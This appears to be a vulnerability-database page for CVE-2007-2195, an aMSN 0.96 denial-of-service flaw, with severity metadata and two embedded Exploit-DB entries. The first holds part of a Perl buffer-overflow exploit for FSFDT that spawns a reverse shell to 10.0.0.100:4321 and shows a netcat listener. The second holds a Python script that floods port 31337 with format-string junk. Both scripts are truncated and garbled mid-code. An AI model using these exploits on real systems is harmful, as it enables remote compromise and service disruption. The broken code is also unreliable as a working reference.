CVE-2007-2195
Published 2007-04-24
Priority: P4 19 | medium 5 | CVSS 2.0: AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 3.34% (87.1th percentile)
aMSN (aka Alvaro's Messenger) 0.96 and earlier allows remote attackers to cause a denial of service (application crash) by sending invalid data to TCP port 31337.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alvaro | alvaros_messenger | <= 0.96 | — |
No detection rules found.
Exploit-DB
FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
exploitdb·2007-10-04
CVE-2007-5256 FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
---
# ~$ nc -l -p 4321
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# E:\draft\fsd1110\windows>_
#
# -------------------------------------------
#!/usr/bin/perl
# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to 10.0.0.100:4321
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4
use IO::Socket;
if( $#ARGV ";
exit();
}
my $ip = $ARGV[0];
my $port = $ARGV[1];
print "connecting...\n";
my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', );
die "could not create socket: $!\n" unless $sock;
# jmp esp in KERNEL32.DLL 5.0.2195.7006
my $jmpesp = "\xB7\x49\xE7\x77";
# encoded 'jmp 0x400' to jump to stage2
my $jmpcode =
"
Exploit-DB
AMSN 0.96 - Malformed Message Denial of Service
exploitdb·2007-04-21
CVE-2007-2195 AMSN 0.96 - Malformed Message Denial of Service
---
source: https://www.securityfocus.com/bid/23583/info
aMsn is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
This issue affects aMsn 0.96 and prior versions.
import socket
HOST = 'victim.com'
PORT = 31337
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
i = 1
while i <= 3:
    s.send('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\
?!"?$%&/()=?`#+#-.,;:_??????%X%X%X%X%X%XXX%X%x%x%x%x%x%x%x%x%x%n%n%n\
%n%n%n%n%n%n\????#?[{#?]?#\`~??')
---fuck off here---
I think it was the character '}', '{' or '%x', '%n'. Try to determ
Published: 2007-04-24